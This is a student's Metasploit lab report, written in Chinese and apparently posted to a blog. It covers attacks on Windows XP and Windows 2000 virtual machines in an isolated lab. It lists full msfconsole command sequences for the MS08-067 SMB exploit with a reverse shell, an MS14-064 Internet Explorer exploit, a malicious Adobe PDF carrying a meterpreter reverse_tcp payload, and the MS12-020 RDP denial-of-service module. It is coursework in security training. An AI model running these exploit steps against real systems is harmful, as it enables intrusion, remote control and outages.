实验六 Metasploit攻击渗透实践 20192422李俊洁

一.实验过程

任务一 一个主动攻击实践

我选择查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击
攻击机:Kali GNU/Linux
ip地址:192.168.56.107
靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
ip地址:192.168.56.109

1.检测连通性

2.xp设置

关闭防火墙。关闭自动更新

3.linux执行

msfconsole//进入msfconsole
search MS08-067//查找模块
use exploit/windows/smb/ms08_067_netapi//选择模块
set payload generic/shell_reverse_tcp//使用载荷
set lhost 192.168.56.107//攻击机ip
set lport 4567//端口
set RHOSTS 192.168.56.109//靶机ip
最终配置如下

exploit//开始渗透

可见攻击成功了

任务二 一个针对浏览器的攻击

攻击机:Kali GNU/Linux
ip地址:192.168.56.107
靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
ip地址:192.168.56.104

1.linux执行

msfconsole
search exploit Microsoft Internet Explorer//查找和Windows的IE浏览器相关的漏洞

选择了2014年11月发布的漏洞exploit/windows/browser/ms14_064_ole_code_execution

进行配置
use exploit/windows/browser/ms14_064_ole_code_execution
set LHOST 192.168.56.107//设置攻击机ip
exploit

将生成的网址http://192.168.56.107:8080/RceGKvyM在靶机中打开


成功获取到shell,可见攻击成功了

任务三 针对客户端攻击

选择对Adobe的攻击
攻击机:Kali GNU/Linux
ip地址:192.168.56.107
靶机:Windows XP SP3 Chinese - Simplified (NX)  操作系统
ip地址:192.168.56.104

1.linux执行

msfconsole
search adobe//查找Adobe漏洞

use windows/fileformat/adobe_cooltype_sing //使用漏洞
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.56.107 //攻击者地址
set FILENAME 20192422ljj.pdf //设置生成pdf文件
exploit //攻击

将生成的文件放入靶机中(靶机需提前安全adobe)
Linux下:
back
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //选择攻击载荷
set LHOST 192.168.81.129 //攻击者地址
exploit


可以看出攻击成功了

任务四 成功应用任何一个辅助模块

我选择实现MS12-020(CVE-2012-0002)蓝屏攻击
攻击机:Kali GNU/Linux
ip地址:192.168.56.107
靶机:Windows 2000
ip地址:192.168.56.108
msfconsole
search ms12-020 //搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST 192.168.56.108//靶机地址
exploit

可见靶机被蓝屏了,攻击成功

二.实验中遇见的问题

1.关于任务一,我迟迟无法进行连接

解决方法:忽略了防火墙和自动更新问题,将其都关闭都,再重启,即可成功连接,即攻击成功

2.关于任务二,我尝试使用不同的漏洞,但是仅2014年11月发布的漏洞可以生成能够连接的网址,其他漏洞要么无法生成网址,要么网址无法连接,即404

解决方法:使用2014的漏洞

三.实验感想

通过本次实验,我再次了解到了msfconsole的强大功能,同时对于msfconsole自带的辅助软件也有了一些了解。虽然前几次实验也使用过msfconsole,但是这次实验让我系统地了解了它的六大模块,可谓是受益匪浅。
感谢老师的指导,同学们的帮助,期待下一次的实验。

posted on 2022-05-15 21:02  20192422李俊洁  阅读(77)  评论(0编辑  收藏  举报